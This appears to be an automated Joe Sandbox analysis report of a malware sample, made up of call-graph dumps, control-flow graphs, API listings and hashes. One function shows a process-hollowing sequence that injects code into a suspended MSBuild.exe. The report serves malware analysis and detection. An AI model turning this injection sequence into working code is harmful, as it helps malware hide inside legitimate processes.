d86d48 21448->21449 21452 d86d80 21449->21452 21469 d870c0 21452->21469 21483 d951e4 21469->21483 21484 d975d3 __Getctype 39 API calls 21483->21484 21485 d951ef 21484->21485 21511 d87339 21510->21511 21512 d868b0 21510->21512 21527 d874f0 21511->21527 21512->21162 21514 d87350 21512->21514 21515 d81db0 std::_Throw_Cpp_error 5 API calls 21514->21515 21516 d87389 21515->21516 21517 d8739a 21516->21517 21518 d81e30 std::_Throw_Cpp_error 30 API calls 21516->21518 21518->21517 21530 d897c5 21527->21530 21535 d89898 21530->21535 21536 d83be0 std::invalid_argument::invalid_argument 29 API calls 21535->21536 21550 d8752c 21549->21550 21551 d8753e 21549->21551 21553 d82690 21550->21553 21551->21167 23291 d94776 23292 d94781 23291->23292 23293 d94796 23291->23293 23296 d934c5 __dosmaperr 14 API calls 23292->23296 23294 d9479e 23293->23294 23295 d947b3 23293->23295 23298 d934c5 __dosmaperr 14 API calls 23294->23298 23305 d9def3 23295->23305 23297 d94786 23296->23297 23300 d93bb0 __strnicoll 29 API calls 23297->23300 23301 d947a3 23298->23301 23302 d94791 23300->23302 23303 d93bb0 __strnicoll 29 API calls 23301->23303 23304 d947ae 23303->23304 23306 d9df07 _Fputc 23305->23306 23309 d9e49c 23306->23309 23308 d9df13 _Fputc 23308->23304 23310 d9e4a8 ___scrt_is_nonwritable_in_current_image 23309->23310 23311 d9e4af 23310->23311 23312 d9e4d2 23310->23312 23313 d93d59 __strnicoll 29 API calls 23311->23313 23320 d8f144 EnterCriticalSection 23312->23320 23315 d9e4c8 23313->23315 23315->23308 23316 d9e4e0 23321 d9e2fb 23316->23321 23318 d9e4ef 23334 d9e521 23318->23334 23320->23316 23322 d9e30a 23321->23322 23323 d9e332 23321->23323 23324 d93d59 __strnicoll 29 API calls 23322->23324 23325 d9aab8 __fread_nolock 29 API calls 23323->23325 23332 d9e325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23324->23332 23326 d9e33b 23325->23326 23337 d9dd2d 23326->23337 23329 d9e3e5 23340 d9df85 23329->23340 23331 d9e3fc 23331->23332 23352 d9e130 23331->23352 23332->23318 23375 d8f158 LeaveCriticalSection 23334->23375 23336 d9e529 23336->23315 23359 d9dd4b 23337->23359 23341 d9df94 _Fputc 23340->23341 23342 d9aab8 __fread_nolock 29 API calls 23341->23342 23343 d9dfb0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23342->23343 23345 d9dd2d 33 API calls 23343->23345 23351 d9dfbc 23343->23351 23344 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 23346 d9e12e 23344->23346 23347 d9e010 23345->23347 23346->23332 23348 d9e042 ReadFile 23347->23348 23347->23351 23349 d9e069 23348->23349 23348->23351 23350 d9dd2d 33 API calls 23349->23350 23350->23351 23351->23344 23353 d9aab8 __fread_nolock 29 API calls 23352->23353 23354 d9e143 23353->23354 23355 d9e18d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23354->23355 23356 d9dd2d 33 API calls 23354->23356 23355->23332 23357 d9e1ea 23356->23357 23357->23355 23358 d9dd2d 33 API calls 23357->23358 23358->23355 23361 d9dd57 ___scrt_is_nonwritable_in_current_image 23359->23361 23360 d9dd9a 23362 d93d59 __strnicoll 29 API calls 23360->23362 23361->23360 23363 d9dde0 23361->23363 23369 d9dd46 23361->23369 23362->23369 23370 d9ebd5 EnterCriticalSection 23363->23370 23365 d9dde6 23366 d9de07 23365->23366 23367 d9de70 __fread_nolock 31 API calls 23365->23367 23371 d9de68 23366->23371 23367->23366 23369->23329 23369->23331 23369->23332 23370->23365 23374 d9ebf8 LeaveCriticalSection 23371->23374 23373 d9de6e 23373->23369 23374->23373 23375->23336 23445 d8a710 23446 d8a712 23445->23446 23447 d8a8c5 69 API calls 23446->23447 23450 d8a749 23446->23450 23448 d8a739 23447->23448 23448->23450 23451 d94d8f 23448->23451 23452 d94d9a 23451->23452 23453 d94daf 23451->23453 23455 d934c5 __dosmaperr 14 API calls 23452->23455 23453->23452 23454 d94db6 23453->23454 23461 d93575 23454->23461 23456 d94d9f 23455->23456 23458 d93bb0 __strnicoll 29 API calls 23456->23458 23460 d94daa 23458->23460 23459 d94dc5 23459->23450 23460->23450 23462 d93588 _Fputc 23461->23462 23465 d937ee 23462->23465 23464 d9359d _Fputc 23464->23459 23467 d937fa ___scrt_is_nonwritable_in_current_image 23465->23467 23466 d93800 23468 d93d59 __strnicoll 29 API calls 23466->23468 23467->23466 23469 d93843 23467->23469 23475 d9381b 23468->23475 23476 d8f144 EnterCriticalSection 23469->23476 23471 d9384f 23477 d93702 23471->23477 23473 d93865 23488 d9388e 23473->23488 23475->23464 23476->23471 23478 d93728 23477->23478 23479 d93715 23477->23479 23491 d93629 23478->23491 23479->23473 23481 d9374b 23482 d937d9 23481->23482 23483 d93766 23481->23483 23495 d9df29 23481->23495 23482->23473 23485 d9437f ___scrt_uninitialize_crt 64 API calls 23483->23485 23486 d93779 23485->23486 23509 d9dd0f 23486->23509 23512 d8f158 LeaveCriticalSection 23488->23512 23490 d93896 23490->23475 23492 d93692 23491->23492 23493 d9363a 23491->23493 23492->23481 23493->23492 23494 d9dccf __fread_nolock 31 API calls 23493->23494 23494->23492 23496 d9e2fb 23495->23496 23497 d9e30a 23496->23497 23498 d9e332 23496->23498 23499 d93d59 __strnicoll 29 API calls 23497->23499 23500 d9aab8 __fread_nolock 29 API calls 23498->23500 23507 d9e325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23499->23507 23501 d9e33b 23500->23501 23502 d9dd2d 33 API calls 23501->23502 23503 d9e359 23502->23503 23504 d9e3e5 23503->23504 23506 d9e3fc 23503->23506 23503->23507 23505 d9df85 34 API calls 23504->23505 23505->23507 23506->23507 23508 d9e130 33 API calls 23506->23508 23507->23483 23508->23507 23510 d9de70 __fread_nolock 31 API calls 23509->23510 23511 d9dd28 23510->23511 23511->23482 23512->23490 22164 d8f234 22165 d94311 ___scrt_uninitialize_crt 68 API calls 22164->22165 22166 d8f23c 22165->22166 22174 d99bd7 22166->22174 22168 d8f241 22169 d99c82 14 API calls 22168->22169 22170 d8f250 DeleteCriticalSection 22169->22170 22170->22168 22171 d8f26b 22170->22171 22172 d97347 ___free_lconv_mon 14 API calls 22171->22172 22173 d8f276 22172->22173 22175 d99be3 ___scrt_is_nonwritable_in_current_image 22174->22175 22184 d93ea8 EnterCriticalSection 22175->22184 22177 d99c5a 22189 d99c79 22177->22189 22178 d99bee 22178->22177 22180 d99c2e DeleteCriticalSection 22178->22180 22185 d94169 22178->22185 22183 d97347 ___free_lconv_mon 14 API calls 22180->22183 22183->22178 22184->22178 22186 d9417c _Fputc 22185->22186 22192 d94227 22186->22192 22188 d94188 _Fputc 22188->22178 22264 d93ebf LeaveCriticalSection 22189->22264 22191 d99c66 22191->22168 22193 d94233 ___scrt_is_nonwritable_in_current_image 22192->22193 22194 d9423d 22193->22194 22195 d94260 22193->22195 22196 d93d59 __strnicoll 29 API calls 22194->22196 22202 d94258 22195->22202 22203 d8f144 EnterCriticalSection 22195->22203 22196->22202 22198 d9427e 22204 d94199 22198->22204 22200 d9428b 22218 d942b6 22200->22218 22202->22188 22203->22198 22205 d941c9 22204->22205 22206 d941a6 22204->22206 22208 d9437f ___scrt_uninitialize_crt 64 API calls 22205->22208 22216 d941c1 22205->22216 22207 d93d59 __strnicoll 29 API calls 22206->22207 22207->22216 22209 d941e1 22208->22209 22210 d99c82 14 API calls 22209->22210 22211 d941e9 22210->22211 22212 d9aab8 __fread_nolock 29 API calls 22211->22212 22213 d941f5 22212->22213 22221 d9ecd1 22213->22221 22216->22200 22217 d97347 ___free_lconv_mon 14 API calls 22217->22216 22263 d8f158 LeaveCriticalSection 22218->22263 22220 d942bc 22220->22202 22224 d941fc 22221->22224 22225 d9ecfa 22221->22225 22222 d9ed49 22223 d93d59 __strnicoll 29 API calls 22222->22223 22223->22224 22224->22216 22224->22217 22225->22222 22226 d9ed21 22225->22226 22228 d9ed74 22226->22228 22229 d9ed80 ___scrt_is_nonwritable_in_current_image 22228->22229 22236 d9ebd5 EnterCriticalSection 22229->22236 22231 d9ed8e 22232 d9edbf 22231->22232 22237 d9ec31 22231->22237 22250 d9edf9 22232->22250 22236->22231 22238 d9e98c __fread_nolock 29 API calls 22237->22238 22239 d9ec41 22238->22239 22240 d9ec47 22239->22240 22241 d9ec79 22239->22241 22243 d9e98c __fread_nolock 29 API calls 22239->22243 22253 d9e9f6 22240->22253 22241->22240 22244 d9e98c __fread_nolock 29 API calls 22241->22244 22245 d9ec70 22243->22245 22246 d9ec85 CloseHandle 22244->22246 22247 d9e98c __fread_nolock 29 API calls 22245->22247 22246->22240 22248 d9ec91 GetLastError 22246->22248 22247->22241 22248->22240 22249 d9ec9f __fread_nolock 22249->22232 22262 d9ebf8 LeaveCriticalSection 22250->22262 22252 d9ede2 22252->22224 22254 d9ea6c 22253->22254 22255 d9ea05 22253->22255 22256 d934c5 __dosmaperr 14 API calls 22254->22256 22255->22254 22261 d9ea2f 22255->22261 22257 d9ea71 22256->22257 22258 d934d8 __dosmaperr 14 API calls 22257->22258 22259 d9ea5c 22258->22259 22259->22249 22260 d9ea56 SetStdHandle 22260->22259 22261->22259 22261->22260 22262->22252 22263->22220 22264->22191

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00DB211B,00DB210B), ref: 00DB233F
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00DB2352
                                                                                                                  • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00DB2370
                                                                                                                  • ReadProcessMemory.KERNELBASE(00000138,?,00DB215F,00000004,00000000), ref: 00DB2394
                                                                                                                  • VirtualAllocEx.KERNELBASE(00000138,?,?,00003000,00000040), ref: 00DB23BF
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000138,00000000,?,?,00000000,?), ref: 00DB2417
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000138,00400000,?,?,00000000,?,00000028), ref: 00DB2462
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000138,?,?,00000004,00000000), ref: 00DB24A0
                                                                                                                  • Wow64SetThreadContext.KERNEL32(0000008C,00D70000), ref: 00DB24DC
                                                                                                                  • ResumeThread.KERNELBASE(0000008C), ref: 00DB24EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction ID: c401c7c4eed8237b087d88cc671c4cd657f927fc33073c425b251e2272dd053b
                                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction Fuzzy Hash: ADB1F77660064AEFDB60CF68CC80BEA73A5FF88714F158514EA09AB341D774FA51CBA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 26 d98362-d9836e 27 d98400-d98403 26->27 28 d98409 27->28 29 d98373-d98384 27->29 30 d9840b-d9840f 28->30 31 d98391-d983aa LoadLibraryExW 29->31 32 d98386-d98389 29->32 35 d983ac-d983b5 GetLastError 31->35 36 d98410-d98420 31->36 33 d98429-d9842b 32->33 34 d9838f 32->34 33->30 38 d983fd 34->38 39 d983ee-d983fb 35->39 40 d983b7-d983c9 call d9b8f3 35->40 36->33 37 d98422-d98423 FreeLibrary 36->37 37->33 38->27 39->38 40->39 43 d983cb-d983dd call d9b8f3 40->43 43->39 46 d983df-d983ec LoadLibraryExW 43->46 46->36 46->39
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6FF93721,?,00D98471,?,?,00000000), ref: 00D98423
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction ID: bacdf6155509dc8be18f8ee99360d623ce22004bd56c8a94474ecdc33e326e93
                                                                                                                  • Opcode Fuzzy Hash: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction Fuzzy Hash: 6421C331A01315EBDF219B65EC44A5F3B59AF46BA0F290221E951E7391DB30ED01D6F0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378416451-0
                                                                                                                  • Opcode ID: 7393ef3a266840ecfb28bafa78b5fbde04fc02a3c87046dfa455003385cd42a0
                                                                                                                  • Instruction ID: d36972b7b1b45452316c96974dc5d16a88178b67316fb41438f00e4ea8c49c43
                                                                                                                  • Opcode Fuzzy Hash: 7393ef3a266840ecfb28bafa78b5fbde04fc02a3c87046dfa455003385cd42a0
                                                                                                                  • Instruction Fuzzy Hash: F4719DB4D04648CFDB10EFA8D588B9DBBF0BF48314F508529E499AB345D734A949CF62

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00DB5450
                                                                                                                  • GetLastError.KERNEL32 ref: 00DB54D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatcherErrorExceptionLastUser
                                                                                                                  • String ID: [+]
                                                                                                                  • API String ID: 2542788420-4228040803
                                                                                                                  • Opcode ID: 0599dd6577e283322f880aa0d72cead4a6067a46b4a9fa9e760488837054fcc7
                                                                                                                  • Instruction ID: bebea69b8ce9923d095444d6482f92dc2abf4670e02574bd3305f18181162d5c
                                                                                                                  • Opcode Fuzzy Hash: 0599dd6577e283322f880aa0d72cead4a6067a46b4a9fa9e760488837054fcc7
                                                                                                                  • Instruction Fuzzy Hash: E87138B494522DCBCB64EF68D8987E9BBF0AF28304F1044E9E88D97351D6749AC4CF61

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • FreeConsole.KERNELBASE ref: 00DB56CA
                                                                                                                    • Part of subcall function 00DB52D0: KiUserExceptionDispatcher.NTDLL ref: 00DB5450
                                                                                                                    • Part of subcall function 00DB52D0: GetLastError.KERNEL32 ref: 00DB54D6
                                                                                                                  • VirtualProtect.KERNELBASE ref: 00DB577A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleDispatcherErrorExceptionFreeLastProtectUserVirtual
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 1907986952-2766056989
                                                                                                                  • Opcode ID: b56dada036ecd8eac7e2deeb6d6fce723371349a44208d5ca908306eade98b94
                                                                                                                  • Instruction ID: 8048022a33b03646edbcda1903b209a1eb7bb92fe3edc53de0fadb905393b392
                                                                                                                  • Opcode Fuzzy Hash: b56dada036ecd8eac7e2deeb6d6fce723371349a44208d5ca908306eade98b94
                                                                                                                  • Instruction Fuzzy Hash: D741DCB0A01308DFDB04EFA9E4856DEBBF0EF48314F508519E459AB350D775A944CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 130 d91131-d9113c 131 d9113e-d91151 call d934c5 call d93bb0 130->131 132 d91152-d91165 call d911c2 130->132 137 d91193 132->137 138 d91167-d91184 CreateThread 132->138 142 d91195-d911a1 call d91212 137->142 140 d911a2-d911a7 138->140 141 d91186-d91192 GetLastError call d934eb 138->141 146 d911a9-d911ac 140->146 147 d911ae-d911b2 140->147 141->137 146->147 147->142
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(?,?,Function_00011249,00000000,?,?), ref: 00D9117A
                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00D887F7), ref: 00D91186
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9118D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744730728-0
                                                                                                                  • Opcode ID: 42ca48ce48cf8fc358458ce669de7b0427ef1685e330a331c21387ec5d5895a9
                                                                                                                  • Instruction ID: 2dda4c0fd573d6f12c3103a36390174e9c7cb8f3f64be188fcffdc7c0e6ce86c
                                                                                                                  • Opcode Fuzzy Hash: 42ca48ce48cf8fc358458ce669de7b0427ef1685e330a331c21387ec5d5895a9
                                                                                                                  • Instruction Fuzzy Hash: 93015E7A60031AFFDF15AFA1DC06AAE3BA9EF00364F104158F901A6250DB71DE50EBB0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 150 d9ef5f-d9ef81 151 d9f174 150->151 152 d9ef87-d9ef89 150->152 155 d9f176-d9f17a 151->155 153 d9ef8b-d9efaa call d93d59 152->153 154 d9efb5-d9efd8 152->154 163 d9efad-d9efb0 153->163 157 d9efda-d9efdc 154->157 158 d9efde-d9efe4 154->158 157->158 159 d9efe6-d9eff7 157->159 158->153 158->159 161 d9eff9-d9f007 call d9dd0f 159->161 162 d9f00a-d9f01a call d9f28c 159->162 161->162 168 d9f01c-d9f022 162->168 169 d9f063-d9f075 162->169 163->155 172 d9f04b-d9f061 call d9f309 168->172 173 d9f024-d9f027 168->173 170 d9f0cc-d9f0ec WriteFile 169->170 171 d9f077-d9f07d 169->171 178 d9f0ee-d9f0f4 GetLastError 170->178 179 d9f0f7 170->179 174 d9f0b8-d9f0c5 call d9f738 171->174 175 d9f07f-d9f082 171->175 188 d9f044-d9f046 172->188 176 d9f029-d9f02c 173->176 177 d9f032-d9f041 call d9f6d0 173->177 195 d9f0ca 174->195 183 d9f0a4-d9f0b6 call d9f8fc 175->183 184 d9f084-d9f087 175->184 176->177 185 d9f10c-d9f10f 176->185 177->188 178->179 182 d9f0fa-d9f105 179->182 189 d9f16f-d9f172 182->189 190 d9f107-d9f10a 182->190 200 d9f09f-d9f0a2 183->200 191 d9f112-d9f114 184->191 192 d9f08d-d9f09a call d9f813 184->192 185->191 188->182 189->155 190->185 196 d9f142-d9f14e 191->196 197 d9f116-d9f11b 191->197 192->200 195->200 203 d9f158-d9f16a 196->203 204 d9f150-d9f156 196->204 201 d9f11d-d9f12f 197->201 202 d9f134-d9f13d call d93551 197->202 200->188 201->163 202->163 203->163 204->151 204->203
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9F309: GetConsoleOutputCP.KERNEL32(6FF93721,00000000,00000000,?), ref: 00D9F36C
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9434B,?), ref: 00D9F0E4
                                                                                                                  • GetLastError.KERNEL32(?,?,00D9434B,?,00D9458F,00000000,?,00000000,00D9458F,?,?,?,00DB16F0,0000002C,00D9447B,?), ref: 00D9F0EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2915228174-0
                                                                                                                  • Opcode ID: 2839346c8533af153f96f6b0e8153a4638127b7b16bf3b111813d53bcdbee086
                                                                                                                  • Instruction ID: cc7385be9fe45468e3fe1b4d59745d6cd4e1c6f09eb28ae64fc0bba935c090d3
                                                                                                                  • Opcode Fuzzy Hash: 2839346c8533af153f96f6b0e8153a4638127b7b16bf3b111813d53bcdbee086
                                                                                                                  • Instruction Fuzzy Hash: 4C618E71904219EFDF11DFA8C884AAEBBBAAF49304F190165E904E7252D376DA11DBB0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 207 d9f738-d9f78d call d8c0a0 210 d9f78f 207->210 211 d9f802-d9f812 call d88eaa 207->211 212 d9f795 210->212 215 d9f79b-d9f79d 212->215 216 d9f79f-d9f7a4 215->216 217 d9f7b7-d9f7dc WriteFile 215->217 218 d9f7ad-d9f7b5 216->218 219 d9f7a6-d9f7ac 216->219 220 d9f7fa-d9f800 GetLastError 217->220 221 d9f7de-d9f7e9 217->221 218->215 218->217 219->218 220->211 221->211 222 d9f7eb-d9f7f6 221->222 222->212 223 d9f7f8 222->223 223->211
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D9F0CA,00000000,00D9458F,?,00000000,?,00000000), ref: 00D9F7D4
                                                                                                                  • GetLastError.KERNEL32(?,00D9F0CA,00000000,00D9458F,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9434B), ref: 00D9F7FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
